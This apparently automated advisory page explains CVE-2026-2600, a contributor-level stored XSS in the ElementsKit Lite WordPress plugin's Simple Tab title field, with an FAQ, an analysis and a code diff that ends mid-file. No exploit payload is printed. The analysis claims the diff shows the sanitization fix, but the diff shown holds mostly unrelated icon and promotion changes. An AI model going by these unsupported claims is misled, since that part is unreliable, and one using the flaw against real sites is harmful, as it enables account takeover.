What is CVE-2026-2600?

CVE-2026-2600 is a stored cross-site scripting (XSS) vulnerability in the ElementsKit Elementor Addons and Templates plugin for WordPress, affecting versions up to 3.7.9. It allows authenticated users with contributor-level access or higher to inject arbitrary JavaScript into page content via the ‘ekit_tab_title’ parameter.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping. When a user with the appropriate access level inputs a malicious script into the Simple Tab widget’s title, it is stored in the database and executed when other users view the affected page.

Who is affected by this vulnerability?

Any WordPress site using the ElementsKit Elementor Addons and Templates plugin version 3.7.9 or earlier is vulnerable. Specifically, authenticated users with contributor-level access or higher can exploit this issue.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the ElementsKit plugin installed. If it is version 3.7.9 or earlier, your site is at risk. Additionally, review user roles to see if any contributors have access to the Simple Tab widget.

How can I fix CVE-2026-2600?

The vulnerability is fixed in version 3.8.0 of the ElementsKit plugin. Update the plugin to the latest version to ensure that proper input sanitization and output escaping are applied to the ‘ekit_tab_title’ parameter.

What is the risk level associated with this vulnerability?

CVE-2026-2600 has a CVSS score of 6.4, indicating a medium severity level. This means that while exploitation requires authenticated access, successful attacks can lead to significant security issues such as session hijacking and content manipulation.

What are the potential consequences of exploitation?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browsers of users viewing the compromised page. This could result in session hijacking, administrative account takeover, or distribution of malware.

How does the proof of concept demonstrate the issue?

The proof of concept provides a script that simulates an attack by authenticating a contributor user and injecting a malicious payload into the Simple Tab widget. It illustrates how an attacker can exploit the vulnerability to execute JavaScript on a vulnerable site.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the ElementsKit plugin until a secure version can be installed. Additionally, review user roles and limit contributor access to prevent potential exploitation.

Is this vulnerability common in WordPress plugins?

Stored XSS vulnerabilities are not uncommon in WordPress plugins, particularly those that allow user-generated content. It highlights the importance of proper input validation and output escaping in plugin development.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, ensure all plugins are regularly updated, implement strict user role management, and conduct regular security audits. Additionally, consider using security plugins that provide XSS protection.

Where can I find more information about CVE-2026-2600?

More information about CVE-2026-2600 can be found in the National Vulnerability Database and on security advisory websites. Additionally, the plugin’s changelog will provide insights into the specific changes made in the patched version.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-2600: ElementsKit Elementor Addons and Templates <= 3.7.9 – Authenticated (Contributor+) Stored Cross-Site Scripting via Simple Tab Widget (elementskit-lite)

CVE ID CVE-2026-2600

Plugin elementskit-lite

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.7.9

Patched Version 3.8.0

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2600:
The vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the ElementsKit Elementor Addons and Templates WordPress plugin. It affects the Simple Tab widget in versions up to and including 3.7.9. Attackers with contributor-level access or higher can inject arbitrary JavaScript into pages, which executes when users view those pages. The CVSS score of 6.4 reflects the medium severity of this stored XSS vulnerability.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping on the ‘ekit_tab_title’ parameter. The vulnerability exists in the widget’s rendering logic where user-supplied tab title attributes are processed. The diff shows the plugin’s core structure changes between versions 3.7.9 and 3.8.0, including modifications to configuration files, script handling, and security enhancements. The specific vulnerable code path involves the Simple Tab widget’s title parameter handling without proper sanitization before rendering.

Exploitation requires authenticated access with at least contributor privileges. Attackers craft malicious tab titles containing JavaScript payloads through the Elementor editor interface. When the Simple Tab widget saves these titles via the ‘ekit_tab_title’ parameter, the payload persists in the database. The script executes whenever any user views the compromised page. The attack vector leverages the plugin’s widget configuration system where user input flows directly into page output without adequate validation.

The patch in version 3.8.0 implements proper input sanitization and output escaping for the ‘ekit_tab_title’ parameter. Atomic Edge analysis of the diff shows the update includes security hardening across multiple components. The plugin now validates and escapes user input before storing it in the database and again before rendering it in browser output. This defense-in-depth approach prevents script injection at both storage and display stages.

Successful exploitation allows attackers to execute arbitrary JavaScript in victims’ browsers. This can lead to session hijacking, administrative account takeover, content defacement, and malware distribution. Since the XSS is stored, all users viewing the compromised page become potential victims. The attacker’s ability to manipulate page content with contributor privileges creates significant security risks for WordPress sites using vulnerable plugin versions.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/elementskit-lite/config/module-list.php
+++ b/elementskit-lite/config/module-list.php
@@ -136,6 +136,12 @@
 					'title'             => 'Global Badge',
 					'attributes'        => array( 'new' ),
 				],
+				'scroll-reveal' => [
+					'slug'              => 'scroll-reveal',
+					'package'           => 'pro-disabled',
+					'title'             => 'Scroll Reveal',
+					'attributes'        => array( 'upcoming' ),
+				],
 			)
 		);
 	}
--- a/elementskit-lite/config/widget-list.php
+++ b/elementskit-lite/config/widget-list.php
@@ -277,282 +277,329 @@
 					'title'           => 'Advanced Accordion',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'ekit ekit-accordion',
 				),
 				'advanced-tab' => array(
 					'slug'            => 'advanced-tab',
 					'title'           => 'Advanced Tab',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'ekit ekit-tab',
 				),
 				'hotspot' => array(
 					'slug'            => 'hotspot',
 					'title'           => 'Hotspot',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'eicon-image-hotspot',
 				),
 				'motion-text' => array(
 					'slug'            => 'motion-text',
 					'title'           => 'Motion Text',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'eicon-animation-text',
 				),
 				'twitter-feed' => array(
 					'slug'            => 'twitter-feed',
 					'title'           => 'Twitter Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'eicon-twitter-feed',
 				),
 				'instagram-feed'       => array(
 					'slug'            => 'instagram-feed',
 					'title'           => 'Instagram Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'ekit ekit-instagram',
 				),
 				'gallery'              => array(
 					'slug'            => 'gallery',
 					'title'           => 'Gallery',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'ekit ekit-image-gallery',
 				),
 				'chart'                => array(
 					'slug'            => 'chart',
 					'title'           => 'Chart',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'eicon-shape',
 				),
 				'woo-category-list'    => array(
 					'slug'            => 'woo-category-list',
 					'title'           => 'Woo Category List',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'woocommerce', // woocommerce
+					'icon'            => 'eicon-product-categories',
 				),
 				'woo-mini-cart'        => array(
 					'slug'            => 'woo-mini-cart',
 					'title'           => 'Woo Mini Cart',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'woocommerce', // woocommerce
+					'icon'            => 'eicon-product-add-to-cart',
 				),
 				'woo-product-carousel' => array(
 					'slug'            => 'woo-product-carousel',
 					'title'           => 'Woo Product Carousel',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'woocommerce', // woocommerce
+					'icon'            => 'eicon-carousel',
 				),
 				'woo-product-list'     => array(
 					'slug'            => 'woo-product-list',
 					'title'           => 'Woo Product List',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'woocommerce', // woocommerce
+					'icon'            => 'eicon-editor-list-ul',
 				),
 				'table'                => array(
 					'slug'            => 'table',
 					'title'           => 'Data Table',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'eicon-table',
 				),
 				'timeline'             => array(
 					'slug'            => 'timeline',
 					'title'           => 'Timeline',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-horizontal-timeline',
 				),
 				'creative-button'      => array(
 					'slug'            => 'creative-button',
 					'title'           => 'Creative Button',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'eicon-button',
 				),
 				'vertical-menu'        => array(
 					'slug'            => 'vertical-menu',
 					'title'           => 'Vertical Menu',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'header-footer', // header footer
+					'icon'            => 'eicon-nav-menu',
 				),
 				'advanced-toggle'      => array(
 					'slug'            => 'advanced-toggle',
 					'title'           => 'Advanced Toggle',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'eicon-toggle',
 				),
 				'video-gallery'        => array(
 					'slug'            => 'video-gallery',
 					'title'           => 'Video Gallery',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'eicon-youtube',
 				),
 				'zoom'                 => array(
 					'slug'            => 'zoom',
 					'title'           => 'Zoom',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'eicon-button',
 				),
 				'behance-feed'         => array(
 					'slug'            => 'behance-feed',
 					'title'           => 'Behance Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'ekit ekit-behance',
 				),
 				'breadcrumb' => array(
 					'slug'            => 'breadcrumb',
 					'title'           => 'Breadcrumb',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'header-footer', // header footer
+					'icon'            => 'eicon-button',
 				),
 				'dribble-feed' => array(
 					'slug'            => 'dribble-feed',
 					'title'           => 'Dribbble Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'ekit ekit-dribbble',
 				),
 				'facebook-feed' => array(
 					'slug'            => 'facebook-feed',
 					'title'           => 'Facebook Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'eicon-fb-feed',
 				),
 				'facebook-review' => array(
 					'slug'            => 'facebook-review',
 					'title'           => 'Facebook Review',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'review-testimonials', // review testimonials
+					'icon'            => 'eicon-button'
 				),
 				'yelp' => array(
 					'slug'            => 'yelp',
 					'title'           => 'Yelp',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'review-testimonials', // review testimonials
+					'icon'            => 'eicon-favorite',
 				),
 				'pinterest-feed' => array(
 					'slug'            => 'pinterest-feed',
 					'title'           => 'Pinterest Feed',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'social-media-feeds', // social media feeds
+					'icon'            => 'ekit ekit-pinterest',
 				),
 				'popup-modal' => array(
 					'slug'            => 'popup-modal',
 					'title'           => 'Popup Modal',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'marketing', // marketing
+					'icon'            => 'eicon-button',
 				),
 				'google-map' => array(
 					'slug'            => 'google-map',
 					'title'           => 'Google Maps',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'eicon-google-maps',
 				),
 				'unfold' => array(
 					'slug'            => 'unfold',
 					'title'           => 'Unfold',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'eicon-button',
 				),
 				'image-swap' => array(
 					'slug'            => 'image-swap',
 					'title'           => 'Image Swap',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-image-swap',
 				),
 				'whatsapp' => array(
 					'slug'            => 'whatsapp',
 					'title'           => 'WhatsApp',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // general
+					'icon'            => 'ekit ekit-whatsapp',
 				),
 				'advanced-slider' => array(
 					'slug'            => 'advanced-slider',
 					'title'           => 'Advanced Slider',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'ekit ekit-advanced-slider',
 				),
 				'image-hover-effect' => array(
 					'slug'            => 'image-hover-effect',
 					'title'           => 'Image Hover Effect',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'			  => 'ekit ekit-image-hover-effect',
 				),
 				'fancy-animated-text' => array(
 					'slug'            => 'fancy-animated-text',
 					'title'           => 'Fancy Animated Text',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-fancy-heading',
 				),
 				'price-menu' => array(
 					'slug'            => 'price-menu',
 					'title'           => 'Price Menu',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'marketing', // marketing
+					'icon'            => 'ekit ekit-price-menu',
 				),
 				'stylish-list' => array(
 					'slug'            => 'stylish-list',
 					'title'           => 'Stylish List',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-stylish-list',
 				),
 				'team-slider' => array(
 					'slug'            => 'team-slider',
 					'title'           => 'Team Slider',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'ekit ekit-team-carousel-slider',
 				),
 				'audio-player' => array(
 					'slug'            => 'audio-player',
 					'title'           => 'Audio Player',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'general', // General
+					'icon'            => 'ekit ekit-audio-player',
 				),
 				'flip-box' => array(
 					'slug'    => 'flip-box',
 					'title'   => 'Flip Box',
 					'package' => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'    => 'ekit ekit-flip-box',
 				),
 				'image-morphing' => array(
 					'slug'            => 'image-morphing',
 					'title'           => 'Image Morphing',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-image-morphing',
 				),
 				'content-ticker' => array(
 					'slug'            => 'content-ticker',
 					'title'           => 'Content Ticker',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'marketing', // marketing
+					'icon'            => 'ekit ekit-content-ticker',
 				),
 				'coupon-code' => array(
 					'slug'            => 'coupon-code',
 					'title'           => 'Coupon Code',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'marketing', // marketing
+					'icon'            => 'ekit ekit-coupon-code',
 				),
 				'comparison-table' => array(
 					'slug'            => 'comparison-table',
 					'title'           => 'Comparison Table',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'marketing', // marketing
+					'icon'            => 'ekit ekit-flip-box',
 				),
 				'protected-content' => array(
 					'slug'            => 'protected-content',
 					'title'           => 'Protected Content',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'advanced', // advanced
+					'icon'            => 'ekit ekit-protected-content-v3',
 				),
 				'interactive-links' => array(
 					'slug'            => 'interactive-links',
 					'title'           => 'Interactive Links',
 					'package'         => 'pro-disabled',
 					'widget-category' => 'creative', // creative
+					'icon'            => 'ekit ekit-interactive-link',
 				),
 				'circle-menu' => array(
 					'slug'            => 'circle-menu',
 					'title'           => 'Circle Menu',
 					'package'         => 'pro-disabled',
-					'widget-category' => 'general', // header footer
+					'widget-category' => 'general', // general
+					'icon'            => 'ekit ekit-coupon-code',
 				),
 				'advanced-search' => array(
 					'slug'    => 'advanced-search',
 					'title'   => 'Advanced Search',
 					'package' => 'pro-disabled',
 					'widget-category' => 'header-footer', // header footer
+					'icon'    => 'ekit ekit-search',
 				),
 			)
 		);
--- a/elementskit-lite/core/build-inline-scripts.php
+++ b/elementskit-lite/core/build-inline-scripts.php
@@ -5,9 +5,9 @@

 /**
  * Inline script registrar.
- *
+ *
  * Returns all necessary inline js & css.
- *
+ *
  * @since 1.0.0
  * @access public
  */
@@ -15,13 +15,16 @@

 	use ElementsKit_LiteTraitsSingleton;

-	function __construct() {
-		add_action( 'wp_enqueue_scripts', array( $this, 'frontend_js' ) );
-		add_action( 'admin_print_scripts', array( $this, 'admin_js' ) );
+	public function __construct() {
+		// Frontend + Admin scripts
+		add_action( 'wp_print_scripts', array( $this, 'print_inline_script' ) );
 	}

-
-	// scripts for common end, admin & frontend
+	/**
+	 * Get common inline JavaScript.
+	 *
+	 * @return string
+	 */
 	public function common_js() {
 		ob_start(); ?>

@@ -30,24 +33,20 @@
 		}

 		<?php
-		$output = ob_get_contents();
+		$output =  ob_get_contents();
 		ob_end_clean();
 		return $output;
 	}

-
-
-	// scripts for frontend
-	public function frontend_js() {
-		$js = $this->common_js();
-		wp_add_inline_script( 'elementskit-framework-js-frontend', $js );
-	}
-
-
-	// scripts for admin
-	public function admin_js() {
-		echo "<script type='text/javascript'>n";
-		echo ElementsKit_LiteUtils::render( $this->common_js() );  // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- Content already escaped in common_js() method
-		echo "n</script>";
+	/**
+	 * Print inline JavaScript.
+	 *
+	 * @return void
+	 */
+	public function print_inline_script() {
+		printf(
+			"<script type='text/javascript'>%s</script>",
+			ElementsKit_LiteUtils::render( $this->common_js() )
+		);
 	}
 }
--- a/elementskit-lite/core/config-list.php
+++ b/elementskit-lite/core/config-list.php
@@ -25,6 +25,11 @@
 			return ( $this->{$data . '_list'}[ $module ] ?? false );
 		}

+		// Return all items including pro-disabled for promotion purposes
+		if ( $data === 'all' ) {
+			return $this->full_list;
+		}
+
 		return $this->{$data . '_list'};
 	}

--- a/elementskit-lite/core/editor-promotion.php
+++ b/elementskit-lite/core/editor-promotion.php
@@ -0,0 +1,81 @@
+<?php
+namespace ElementsKit_LiteCore;
+
+defined('ABSPATH') || exit;
+
+class Editor_Promotion {
+
+	use ElementsKit_LiteTraitsSingleton;
+
+	public function init() {
+		// Enqueue promotion scripts
+		add_action('elementor/editor/before_enqueue_scripts', [$this, 'enqueue_editor_scripts']);
+	}
+
+	/**
+	 * Get promotion widgets data
+	 */
+	private function get_promotion_widgets_data() {
+		$widget_list = ElementsKit_LiteConfigWidget_List::instance()->get_list('all');
+		$promotion_data = [];
+
+		foreach ($widget_list as $slug => $widget) {
+			if (isset($widget['package']) && $widget['package'] === 'pro-disabled') {
+				$promotion_data[] = [
+					'name' => 'ekit-' . $slug,
+					'title' => isset($widget['title']) ? $widget['title'] : ucwords(str_replace('-', ' ', $slug)),
+					'icon' => isset($widget['icon']) ? $widget['icon'] : 'eicon-star',
+					'categories' => ['elementskit'],
+					'promotion' => [
+						'title' => sprintf(__('%s Widget', 'elementskit-lite'), isset($widget['title']) ? $widget['title'] : ucwords(str_replace('-', ' ', $slug))),
+						'description' => sprintf(
+							__( 'Unlock the %s widget and dozens of powerful ElementsKit Pro features to design faster, smarter, and more flexible websites.', 'elementskit-lite'),
+							isset($widget['title']) ? $widget['title'] : ucwords(str_replace('-', ' ', $slug))
+						),
+						'upgrade_url' => 'https://wpmet.com/plugin/elementskit/pricing/',
+						'upgrade_text' => __('Upgrade Now', 'elementskit-lite'),
+					],
+				];
+			}
+		}
+		return $promotion_data;
+	}
+
+	/**
+	 * Enqueue editor scripts for promotion
+	 */
+	public function enqueue_editor_scripts() {
+		$promotion_widgets = $this->get_promotion_widgets_data();
+
+		wp_enqueue_script(
+			'elementskit-editor-promotion',
+			ElementsKit_Lite::widget_url() . 'init/assets/js/editor-promotion.js',
+			['elementor-editor', 'elementor-common'],
+			ElementsKit_Lite::version(),
+			true
+		);
+
+		wp_localize_script(
+			'elementskit-editor-promotion',
+			'ekitPromotion',
+			[
+				'promotionWidgets' => $promotion_widgets,
+				'upgradeUrl' => 'https://wpmet.com/plugin/elementskit/pricing/',
+				'debug' => true,
+				'i18n' => [
+					'proFeature' => __('Pro Feature', 'elementskit-lite'),
+					'upgradeNow' => __('Upgrade Now', 'elementskit-lite'),
+					'learnMore' => __('Learn More', 'elementskit-lite'),
+				],
+			]
+		);
+
+		// Enqueue styles
+		wp_enqueue_style(
+			'elementskit-editor-promotion',
+			ElementsKit_Lite::widget_url() . 'init/assets/css/editor-promotion.css',
+			[],
+			ElementsKit_Lite::version()
+		);
+	}
+}
--- a/elementskit-lite/core/handler-api.php
+++ b/elementskit-lite/core/handler-api.php
@@ -1,4 +1,4 @@
-<?php
+<?php
 namespace ElementsKit_LiteCore;

 class Handler_Api {
@@ -25,7 +25,7 @@
 					array(
 						'methods'             => WP_REST_Server::ALLMETHODS,
 						'callback'            => array( $this, 'callback' ),
-						'permission_callback' => '__return_true',
+						'permission_callback' => '__return_true',
 					// all permissions are implimented inside the callback action
 					)
 				);
@@ -39,7 +39,8 @@

 		if ( method_exists( $this, $action_class ) ) {
 			return $this->{$action_class}();
+		} else {
+			return new WP_Error( 'invalid_action', esc_html__( 'Invalid action', 'elementskit-lite' ), array( 'status' => 400 ) );
 		}
 	}
-
 }
--- a/elementskit-lite/elementskit-lite.php
+++ b/elementskit-lite/elementskit-lite.php
@@ -9,7 +9,7 @@
  * Description: The most advanced addons for Elementor with tons of widgets, Header builder, Footer builder, Mega menu builder, layout pack and powerful custom controls.
  * Plugin URI: https://wpmet.com/plugin/elementskit/
  * Author: Wpmet
- * Version: 3.7.9
+ * Version: 3.8.0
  * Author URI: https://wpmet.com/
  * License: GPLv3 or later
  * License URI: https://www.gnu.org/licenses/gpl-3.0.html
@@ -34,7 +34,7 @@
 	 * @var string The plugin version.
 	 */
 	static function version() {
-		return '3.7.9';
+		return '3.8.0';
 	}

 	/**
--- a/elementskit-lite/helpers/utils.php
+++ b/elementskit-lite/helpers/utils.php
@@ -429,4 +429,36 @@
 	public static function remove_special_chars($string) {
 		return preg_replace('/[^A-Za-z0-9 ]/', '', $string);
 	}
+
+	/**
+	 * Check whether a specific plugin is active.
+	 *
+	 * Works for both single-site and multisite installations
+	 * (including network-activated plugins).
+	 *
+	 * @since 3.7.8
+	 *
+	 * @param string $plugin_file Plugin file path relative to the plugins directory.
+	 *                            Example: 'elementskit/elementskit.php'.
+	 *
+	 * @return bool True if the plugin is active, false otherwise.
+	 */
+	public static function ekit_is_plugin_active( string $plugin_file ): bool {
+		$active_plugins = (array) apply_filters(
+			'active_plugins',
+			get_option( 'active_plugins', [] )
+		);
+
+		// Include network-activated plugins for multisite installs.
+		if ( is_multisite() ) {
+			$network_plugins = array_keys(
+				(array) get_site_option( 'active_sitewide_plugins', [] )
+			);
+
+			$active_plugins = array_merge( $active_plugins, $network_plugins );
+		}
+
+		return in_array( $plugin_file, $active_plugins, true );
+	}
+
 }
--- a/elementskit-lite/libs/framework/attr.php
+++ b/elementskit-lite/libs/framework/attr.php
@@ -51,6 +51,7 @@
 	public function enqueue_scripts() {
 		wp_register_style( 'elementskit-admin-global', ElementsKit_Lite::lib_url() . 'framework/assets/css/admin-global.css', false, ElementsKit_Lite::version() );
 		wp_enqueue_style( 'elementskit-admin-global' );
+		add_filter('admin_footer_text', [$this, 'elementskit_admin_footer_text']);
 	}

 	public function register_settings_menus() {
@@ -67,6 +68,10 @@
 		);
 	}

+	public function elementskit_admin_footer_text($text) {
+		$text = '<span class="gutenkit-footer-text"><i>Thank you for creating with <a href="https://wpmet.com/plugin/elementskit/" target="_blank">ElementsKit</a></i></span>';;
+		return $text;
+	}

 	public function register_settings_contents__settings() {
 		include self::get_dir() . 'views/init.php';
--- a/elementskit-lite/libs/framework/controls/settings/switch.php
+++ b/elementskit-lite/libs/framework/controls/settings/switch.php
@@ -59,9 +59,6 @@
 		}

 		?>
-		<a target="_blank" href="https://wpmet.com/plugin/<?php echo esc_attr( $slug ) . esc_attr( $value ); ?>/" class="ekit-admin-demo-tooltip">
-			<i class="fa fa-laptop"></i>
-			<?php esc_html_e( 'View Demo', 'elementskit-lite' ); ?>
-		</a>
+		<a target="_blank" href="https://wpmet.com/plugin/<?php echo esc_attr( $slug ) . esc_attr( $value ); ?>/" class="ekit-admin-demo-tooltip"><?php esc_html_e( 'Live Demo', 'elementskit-lite' ); ?></a>
 	<?php endif; ?>
 </div>
--- a/elementskit-lite/libs/framework/views/init.php
+++ b/elementskit-lite/libs/framework/views/init.php
@@ -5,22 +5,70 @@
 		'title'     => esc_html__( 'Dashboard', 'elementskit-lite' ),
 		'sub-title' => esc_html__( 'General info', 'elementskit-lite' ),
 		'icon'      => 'icon icon-home',
+		'svg'       => '<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 40 40" style="enable-background:new 0 0 40 40" xml:space="preserve"><style type="text/css">.st0{clip-path:url(#SVGID_2_)}</style><g><defs><rect id="SVGID_1_" width="40" height="40"/></defs><clipPath id="SVGID_2_"><use xlink:href="#SVGID_1_" style="overflow:visible"/></clipPath><g class="st0"><path d="M32.1,40h-6.7c-0.7,0-1.2-0.6-1.2-1.2V27.9c0-0.2-0.2-0.4-0.4-0.4h-7.5c-0.2,0-0.4,0.2-0.4,0.4v10.8
+		c0,0.7-0.6,1.2-1.2,1.2H7.9C6.3,40,5,38.7,5,37.1V21.7H2.1c-1.1,0-2.1-0.9-2.1-2.1c0-0.6,0.2-1.1,0.6-1.5L19.1,0.3
+		c0.5-0.5,1.2-0.5,1.7,0l18.5,17.7c0.4,0.4,0.6,1,0.6,1.5c0,1.1-0.9,2.1-2.1,2.1H35v15.4C35,38.7,33.7,40,32.1,40z M26.7,37.5h5.4
+		c0.2,0,0.4-0.2,0.4-0.4V20.4c0-0.7,0.6-1.2,1.2-1.2h3.1L20,3L3.1,19.2h3.1c0.7,0,1.2,0.6,1.2,1.2v16.7c0,0.2,0.2,0.4,0.4,0.4h5.4
+		v-9.6c0-1.6,1.3-2.9,2.9-2.9h7.5c1.6,0,2.9,1.3,2.9,2.9V37.5z"/></g></g></svg>',
 		// 'view_path' => 'some path to the view file'
 	),
 	'widgets' => array(
 		'title'     => esc_html__( 'Widgets', 'elementskit-lite' ),
 		'sub-title' => esc_html__( 'Enable disable widgets', 'elementskit-lite' ),
 		'icon'      => 'icon icon-magic-wand',
+		'svg'       => '<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 40 40" style="enable-background:new 0 0 40 40" xml:space="preserve"><g><path d="M33.8,21.2H25c-2.1,0-3.8,1.7-3.8,3.8v8.8c0,2.1,1.7,3.8,3.8,3.8h8.8c2.1,0,3.8-1.7,3.8-3.8V25
+		C37.5,22.9,35.8,21.2,33.8,21.2z M35,33.8c0,0.7-0.6,1.2-1.2,1.2H25c-0.7,0-1.2-0.6-1.2-1.2V25c0-0.7,0.6-1.2,1.2-1.2h8.8
+		c0.7,0,1.2,0.6,1.2,1.2V33.8z"/><path d="M15,2.5H6.2c-2.1,0-3.8,1.7-3.8,3.8V15c0,2.1,1.7,3.8,3.8,3.8H15c2.1,0,3.8-1.7,3.8-3.8V6.2C18.8,4.2,17.1,2.5,15,2.5z
+			M16.2,15c0,0.7-0.6,1.2-1.2,1.2H6.2C5.6,16.2,5,15.7,5,15V6.2C5,5.6,5.6,5,6.2,5H15c0.7,0,1.2,0.6,1.2,1.2V15z"/><path d="M22.5,11.2h5.6v6.2c0,0.7,0.6,1.2,1.2,1.2s1.2-0.6,1.2-1.2v-6.2h5.6c0.7,0,1.2-0.6,1.2-1.2s-0.6-1.2-1.2-1.2h-5.6v-5
+		c0-0.7-0.6-1.2-1.2-1.2s-1.2,0.6-1.2,1.2v5h-5.6c-0.7,0-1.2,0.6-1.2,1.2S21.8,11.2,22.5,11.2z"/><path d="M15,21.2H6.2c-2.1,0-3.8,1.7-3.8,3.8v8.8c0,2.1,1.7,3.8,3.8,3.8H15c2.1,0,3.8-1.7,3.8-3.8V25C18.8,22.9,17.1,21.2,15,21.2z
+			M16.2,33.8c0,0.7-0.6,1.2-1.2,1.2H6.2C5.6,35,5,34.4,5,33.8V25c0-0.7,0.6-1.2,1.2-1.2H15c0.7,0,1.2,0.6,1.2,1.2V33.8z"/></g></svg>',
 	),
 	'modules' => array(
 		'title'     => esc_html__( 'Modules', 'elementskit-lite' ),
 		'sub-title' => esc_html__( 'Enable disable modules', 'elementskit-lite' ),
 		'icon'      => 'icon icon-settings-2',
+		'svg'       => '<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 40 40" style="enable-background:new 0 0 40 40" xml:space="preserve"><g><path d="M2.1,7.8h19c0.6,2.6,3,4.4,5.6,4.4s5-1.8,5.6-4.4h5.6c0.7,0,1.3-0.6,1.3-1.3s-0.6-1.3-1.3-1.3h-5.6c-0.6-2.6-3-4.4-5.6-4.4
+		s-5,1.8-5.6,4.4h-19c-0.7,0-1.3,0.6-1.3,1.3S1.4,7.8,2.1,7.8z M26.7,3.4c1.7,0,3.1,1.4,3.1,3.1s-1.4,3.1-3.1,3.1
+		c-1.7,0-3.1-1.4-3.1-3.1C23.5,4.8,25,3.4,26.7,3.4z"/><path d="M37.9,18.7h-19c-0.6-2.6-3-4.4-5.6-4.4c-2.7,0-5,1.8-5.6,4.4H2.1c-0.7,0-1.3,0.6-1.3,1.3s0.6,1.3,1.3,1.3h5.6
+		c0.6,2.6,3,4.4,5.6,4.4s5-1.8,5.6-4.4h19c0.7,0,1.3-0.6,1.3-1.3S38.6,18.7,37.9,18.7z M13.3,23.1c-1.7,0-3.1-1.4-3.1-3.1
+		c0-1.7,1.4-3.1,3.1-3.1c1.7,0,3.1,1.4,3.1,3.1C16.5,21.7,15.1,23.1,13.3,23.1z"/><path d="M37.9,32.2h-5.6c-0.6-2.6-3-4.4-5.6-4.4s-5,1.8-5.6,4.4h-19c-0.7,0-1.3,0.6-1.3,1.3s0.6,1.3,1.3,1.3h19
+		c0.6,2.6,3,4.4,5.6,4.4s5-1.8,5.6-4.4h5.6c0.7,0,1.3-0.6,1.3-1.3S38.6,32.2,37.9,32.2z M26.7,36.6c-1.7,0-3.1-1.4-3.1-3.1
+		c0-1.7,1.4-3.1,3.1-3.1c1.7,0,3.1,1.4,3.1,3.1S28.4,36.6,26.7,36.6z"/></g></svg>',
 	),
 	'usersettings' => array(
